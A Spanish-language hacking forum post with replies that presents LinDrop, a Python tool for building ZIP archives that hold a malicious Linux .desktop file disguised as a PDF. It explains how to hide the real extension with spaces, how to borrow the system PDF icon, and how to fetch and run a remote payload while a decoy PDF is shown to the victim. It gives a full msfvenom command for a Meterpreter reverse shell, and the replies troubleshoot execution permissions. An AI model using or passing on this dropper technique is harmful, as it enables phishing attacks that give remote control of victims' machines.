LinDrop es un vector de ingeniería social dedicado a objetivos con sistema operativo Linux. Se trata de un script en python que genera ZIP con un archivo .desktop malicioso que imita ser un PDF.
Este metodo no es algo nuevo, pero Lindrop destaca por centrar sus objetivos a sistemas Linux, permitiendo enviar archivos zip o tar.gz vía email.
Camuflar archivos .desktop de forma manual:
El método para crear archivos .desktop es bastante antiguo. Guardamos un archivo, escribiendo espacios entre la extensión .pdf y la .desktop. Esto es para ofuscar la extensión actual cuando el archivo se abre con Archive Manager.
Después, editamos nuestro archivo añadiendo algunas líneas para que se parezca más a un archivo pdf:
(https://blog.underc0de.org/wp-content/uploads/2016/11/1.png)
Edición del fichero Underc0de.pdf.desktop
Para el icóno necesitamos una imágen que esté guardada en el objetivo, ya que si no el archivo se mostraría cómo un ejecutable. Para conseguir esto, añadimos la ruta en la que se encuentra la imágen que gnome asocia a los archivos pdf.
(https://blog.underc0de.org/wp-content/uploads/2016/11/2.png)
Fichero Underc0de.pdf.desktop editado
De esta manera conseguimos obtener el archivo .desktop camuflado de forma manual y un poco rudimentaria, ahora veremos cómo se hace con LinDrop de manera más avanzada en cuatro sencillos pasos.
Uso de LinDrop:
(https://blog.underc0de.org/wp-content/uploads/2016/11/3-768x289.png)
Uso de Lindrop.
- 1: introducir el nombre para el archivo "PDF" (.desktop) que estará en el archivo ZIP.
- 2: introducir el nombre para el archivo ZIP.
- 3: introducir url para descarga remota del payload. Este se guardará en el directorio /tmp. Para ello podemos utilizar msfvenom:
Citarmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload
- 4: introducir PDF para mostrar al usuario.
Al acabar obtendremos el archivo zip con el supuesto pdf dentro listo para enviar. Cuando la víctima lo abra, se le mostrará, en este caso, el taller de pentesting de Underc0de para no levantar sospechas, mientras que el payload esta siendo ejecutado y obtendremos nuestra sesión de meterpreter.
(https://blog.underc0de.org/wp-content/uploads/2016/11/4-768x495.png)
Resultado en el equipo víctima del ataque.
El código del script aún es algo sucio, pero tenemos la oportunidad de mejorarlo notablemente y añadirle nuevas características. Si alguno se anima, tiene repositorio en GitHub:
github.com/x-42/LinDrop (http://github.com/x-42/LinDrop)
Un saludo, HATI ;D
Que buena ! recomendaciones ahora que ni con Linux estamos tranquilos? Revisar las cabeceras en hexadecimal del archivo? A lo que entendí en el sistema aparecerá como payload.pdf o payload.pdf .desktop??
Enviado desde mi HTC One mediante Tapatalk
Hola
@dragonay (https://underc0de.org/foro/profile/dragonay/),
Cita de: dragonayrecomendaciones ahora que ni con Linux estamos tranquilos?
Descargar contenido siempre de fuentes fiables y oficiales, evitar enlaces sospechosos, ejecutar los archivos en máquina virtual o sandbox...
Cita de: dragonayA lo que entendí en el sistema aparecerá como payload.pdf o payload.pdf .desktop??
Te equivocas, aparecerá un arvhivo
.zip que contiene un archivo con el siguiente formáto:
"nombredelarchivo".pdf .desktopEn dicho archivo se incluye el payload.
Hola, muchas gracias por compartir.
Lo he probado con una máquina virtual víctima Kali Linux, ya que no tenía otra a mano y funciona perfectamente.
Lo único que no me funciona es que no muestra el icono pdf. He visto la ruta de "Icon" y es correcta.
Ya haré más pruebas en otra máquina Ubuntu.
Hola
@m4x (https://underc0de.org/foro/profile/m4x/),
Cita de: m4xLo único que no me funciona es que no muestra el icono pdf. He visto la ruta de "Icon" y es correcta.
Ya haré más pruebas en otra máquina Ubuntu.
Yo hice la prueba con Kali y funciona perfectamente. Intentalo con otro icono. También puedes probarlo de manera manual, es posible que así te de menos problemas.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Hola @m4x (https://underc0de.org/foro/profile/m4x/),
Cita de: m4xLo único que no me funciona es que no muestra el icono pdf. He visto la ruta de "Icon" y es correcta.
Ya haré más pruebas en otra máquina Ubuntu.
Yo hice la prueba con Kali y funciona perfectamente. Intentalo con otro icono. También puedes probarlo de manera manual, es posible que así te de menos problemas.
El problema estaba en que al pasar el fichero "pdf .desktop" desde el equipo atacante hacia la máquina virtual (víctima) mediante el pendrive, éste fichero se quedaba sin permisos de ejecución. El sistema de ficheros del pendrive es fat32 y he leído que no soporta permisos, por lo que al montarlo se queda solo con los permisos que le da el sistema, o con los permisos que le des tu al montarlo.
Me he dado cuenta que si es un fichero con extensión ".exe" si que lo copia con permisos de escritura, supongo que será porque el sistema de ficheros lo creó Microsoft.
De todas formas esta claro que hay mejores formas de pasar un fichero entre anfitrión e invitado, pero me resultaba más cómodo así, ya que a veces no me funciona bien la opción de arrastrar y soltar.
A partir de ahora me fijaré más cuando descargue ficheros ;D.
Saludos